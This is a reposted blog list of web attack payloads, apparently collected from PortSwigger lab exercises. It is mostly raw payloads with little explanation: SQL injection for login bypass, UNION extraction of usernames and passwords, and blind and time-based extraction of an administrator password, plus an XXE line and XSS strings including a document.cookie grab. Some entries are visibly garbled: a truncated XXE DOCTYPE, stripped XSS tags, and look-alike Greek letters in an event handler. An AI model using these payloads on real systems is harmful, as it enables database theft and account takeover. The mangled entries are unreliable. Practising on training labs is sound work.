• Vulnerability payloads collected from the Burp (PortSwigger) website


    I. SQL injection

    WHERE clause
    '+OR+1=1--
    Login bypass
    administrator'--
    UNION clause
    '+UNION+SELECT+NULL--
    '+UNION+SELECT+NULL,NULL--
    '+UNION+SELECT+'abcdef',NULL,NULL--
    '+UNION+SELECT+'abc','def'--
    '+UNION+SELECT+username,+password+FROM+users--
    '+UNION+SELECT+NULL,'abc'--
    '+UNION+SELECT+NULL,username||'~'||password+FROM+users--
    Determining the database type
    '+UNION+SELECT+'abc','def'+FROM+dual--
    '+UNION+SELECT+BANNER,+NULL+FROM+v$version--
    '+UNION+SELECT+'abc','def'#
    '+UNION+SELECT+@@version,+NULL#
    Listing database contents
    '+UNION+SELECT+'abc','def'--
    '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
    '+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--
    '+UNION+SELECT+username_abcdef,+password_abcdef+FROM+users_abcdef--
    Blind injection
    TrackingId=xyz' AND '1'='1
    TrackingId=xyz' AND '1'='2
    TrackingId=xyz' AND (SELECT 'a' FROM users LIMIT 1)='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator')='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>2)='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>3)='a
    TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a
    TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='§a§
    TrackingId=xyz' AND (SELECT SUBSTRING(password,2,1) FROM users WHERE username='administrator')='a

    TrackingId=xyz'
    TrackingId=xyz''
    TrackingId=xyz'||(SELECT '')||'
    TrackingId=xyz'||(SELECT '' FROM dual)||'
    TrackingId=xyz'||(SELECT '' FROM not-a-real-table)||'
    TrackingId=xyz'||(SELECT '' FROM users WHERE ROWNUM = 1)||'
    TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
    TrackingId=xyz'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
    TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>2 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>3 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,2,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    Time-based blind injection
    TrackingId=x'||pg_sleep(10)--
    TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
    TrackingId=x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>3)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='a')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,2,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual--

    II. XSS

    ">

    javascript:alert(document.cookie)

    "οnmοuseοver="alert(1)

    '-alert(1)-'

    product?productId=1&storeId=">

    {{$on.constructor('alert(1)')()}}

    \'-alert(1)//

    ${alert(1)}

  • Original URL: https://blog.csdn.net/tainqiuer123/article/details/125887065